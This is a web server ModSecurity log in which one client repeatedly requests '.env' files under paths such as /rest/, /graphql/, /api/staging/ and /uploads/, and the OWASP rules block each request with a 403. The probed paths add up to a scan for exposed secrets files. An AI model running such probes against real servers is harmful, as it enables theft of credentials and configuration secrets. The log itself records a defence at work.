[Mon May 11 15:50:11.885878 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agHek6y-5-wpj6Sx56aizgAAABc"]
[Mon May 11 15:50:11.886364 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agHek6y-5-wpj6Sx56aizgAAABc"]
[Mon May 11 15:50:11.886581 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agHek6y-5-wpj6Sx56aizgAAABc"]
[Mon May 11 15:50:11.980559 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agHek6y-5-wpj6Sx56aizwAAABc"]
[Mon May 11 15:50:11.980976 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agHek6y-5-wpj6Sx56aizwAAABc"]
[Mon May 11 15:50:11.981198 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agHek6y-5-wpj6Sx56aizwAAABc"]
[Mon May 11 15:50:12.074994 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0AAAABc"]
[Mon May 11 15:50:12.075390 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0AAAABc"]
[Mon May 11 15:50:12.075581 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0AAAABc"]
[Mon May 11 15:50:12.169703 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0QAAABc"]
[Mon May 11 15:50:12.170180 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0QAAABc"]
[Mon May 11 15:50:12.170390 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0QAAABc"]
[Mon May 11 15:50:12.264667 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0gAAABc"]
[Mon May 11 15:50:12.265045 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0gAAABc"]
[Mon May 11 15:50:12.265244 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0gAAABc"]
[Mon May 11 15:50:12.358945 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0wAAABc"]
[Mon May 11 15:50:12.359341 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0wAAABc"]
[Mon May 11 15:50:12.359531 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agHelKy-5-wpj6Sx56ai0wAAABc"]
[Mon May 11 15:50:12.453147 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1AAAABc"]
[Mon May 11 15:50:12.453516 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1AAAABc"]
[Mon May 11 15:50:12.453695 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1AAAABc"]
[Mon May 11 15:50:12.548616 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1QAAABc"]
[Mon May 11 15:50:12.549021 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1QAAABc"]
[Mon May 11 15:50:12.549227 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1QAAABc"]
[Mon May 11 15:50:12.644055 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1gAAABc"]
[Mon May 11 15:50:12.644485 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1gAAABc"]
[Mon May 11 15:50:12.644685 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1gAAABc"]
[Mon May 11 15:50:12.740898 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1wAAABc"]
[Mon May 11 15:50:12.741321 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1wAAABc"]
[Mon May 11 15:50:12.741514 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agHelKy-5-wpj6Sx56ai1wAAABc"]
[Mon May 11 15:50:13.498365 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agHelat2WtvoFr7xvGzcuQAAAIk"]
[Mon May 11 15:50:13.499101 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agHelat2WtvoFr7xvGzcuQAAAIk"]
[Mon May 11 15:50:13.500179 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agHelat2WtvoFr7xvGzcuQAAAIk"]
[Mon May 11 15:50:13.598052 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agHelat2WtvoFr7xvGzcugAAAIk"]
[Mon May 11 15:50:13.598546 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agHelat2WtvoFr7xvGzcugAAAIk"]
[Mon May 11 15:50:13.598782 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agHelat2WtvoFr7xvGzcugAAAIk"]
[Mon May 11 15:50:13.690428 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agHelat2WtvoFr7xvGzcuwAAAIk"]
[Mon May 11 15:50:13.690836 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agHelat2WtvoFr7xvGzcuwAAAIk"]
[Mon May 11 15:50:13.691070 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agHelat2WtvoFr7xvGzcuwAAAIk"]
